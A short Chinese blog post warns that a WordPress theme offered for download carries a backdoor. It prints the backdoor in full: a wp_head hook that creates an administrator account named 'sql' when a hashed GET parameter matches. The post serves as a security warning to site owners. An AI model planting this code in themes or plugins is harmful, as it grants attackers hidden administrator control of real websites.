WordPress模板中的后门

就在刚刚,在网上乱逛,刚好看到有个网站提供最新D8主题下载,顺手下了看一下,结果下来一看就发现个后门,如下:

add_action( 'wp_head', 'sql' );
function sql() {
if ( md5( $_GET['sql'] ) == '6864f389d9876436bc8778ff071d1b6c' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'sql' ) ) {
$user_id = wp_create_user( 'sql', 'sql' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' ); 
}
}
}

在此也提醒各位使用网上提供的模板时,也要留心注意安全,像这样带有后门的主题不在少数,之前也看到过一句话和参数型后门。